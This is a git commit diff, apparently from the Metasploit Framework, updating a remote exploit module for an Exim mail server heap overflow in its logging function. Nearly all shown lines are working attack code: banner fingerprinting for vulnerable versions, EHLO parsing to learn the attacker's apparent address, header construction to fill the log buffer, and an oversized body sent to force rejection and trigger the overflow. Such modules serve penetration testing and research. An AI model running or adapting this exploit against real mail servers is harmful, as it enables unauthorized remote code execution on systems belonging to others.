Automagic updates to jduck's exim module

git-svn-id: file:///home/svn/framework3/trunk@11277 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-12-10 22:16:34 +00:00
parent d5fc9df054
commit a683f7b7d4
1 changed files with 76 additions and 25 deletions

View File

@ -83,22 +83,77 @@ class Metasploit3 < Msf::Exploit::Remote
# Originally discovered/reported Dec 2 2008
'DisclosureDate' => 'Dec 7 2010', # as an actual security bug
'DefaultTarget' => 0))
register_advanced_options([
OptString.new("SourceAddress", [false, "The IP or hostname of this system as the target will resolve it"])
], self.class)
end
def exploit
from = datastore['MAILFROM']
to = datastore['MAILTO']
helo_host = "X" # From the mixin
#
# Connect and grab the banner
#
ehlo = Rex::Text.rand_text_alphanumeric(8)
connect
print_status("Server: #{self.banner.strip}")
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
if self.banner =~ /Exim (4\.[789]\d)/
print_error("Warning: Exim version #{$1} is not exploitable")
end
if self.banner !~ /Exim/i
print_error("Warning: Could not detect an Exim target")
end
ehlo_resp.each_line do |line|
print_status("EHLO: #{line.strip}")
end
#
# Determine the maximum message size
#
max_msg = 52428800
msg_len = max_msg + 1000 # just for good measure
if ehlo_resp.to_s =~ /250-SIZE (\d+)/
max_msg = $1.to_i
end
#
# Determine what hostname the server sees
#
saddr = nil
if ehlo_resp =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/
ehlo = $1
saddr = $2
end
from = datastore['MAILFROM']
to = datastore['MAILTO']
resp = raw_send_recv("MAIL FROM: #{from}\r\n")
print_status("MAIL: #{resp.strip}")
resp = raw_send_recv("RCPT TO: #{to}\r\n")
print_status("RCPT: #{resp.strip}")
resp = raw_send_recv("DATA\r\n")
print_status("DATA: #{resp.strip}")
#
# Calculate the headers
#
msg_len = max_msg + (1024*256) # just for good measure
log_buffer_size = 8192
ip = Rex::Socket.source_address('1.2.3.4')
source = saddr || datastore["SourceAddress"] || Rex::Socket.source_address('1.2.3.4')
print_status("Determined our hostname is #{ehlo} and IP address is #{source}")
# The initial headers will fill up the 'log_buffer' variable in 'log_write' function
print_status("Constructing initial headers ...")
log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{helo_host}) [#{ip}]: message too big: read=#{msg_len} max=#{max_msg}\n"
print_status("Constructing initial headers (source #{source})...")
log_buffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <#{from}> H=(#{ehlo}) [#{source}]: message too big: read=#{msg_len} max=#{max_msg}\n"
log_buffer << "Envelope-from: <#{from}>\nEnvelope-to: <#{to}>\n"
# Now, " " + hdrline for each header
@ -135,28 +190,24 @@ class Metasploit3 < Msf::Exploit::Remote
# In order to trigger the overflow, we must get our message rejected.
# To do so, we send a message that is larger than the maximum.
print_status("Constructing body ...")
body = ''
659883.times {
body << ("MAILbomb" * 10) + "\n"
}
fill = (Rex::Text.rand_text_alphanumeric(254) + "\r\n") * 16384
body_len = 53450538 - (53477372-52428800) + 1
while(body.length < msg_len)
body << fill
end
body = body[0, msg_len]
print_status("Combining parts ...")
data = ''
data << hdrs1
data << hdrx
data << "\n"
data << body
print_status("Connecting ...")
connect_login
print_status("Sending data ...")
sock.put data
sock.put hdrs1
sock.put hdrx
sock.put "\n"
sock.put body
print_status("Ending first message.")
buf = raw_send_recv("\n.\n")
buf = raw_send_recv("\r\n.\r\n")
# Should be: ""552 Message size exceeds maximum permitted\r\n"
print_status("Result: #{buf.inspect}") if buf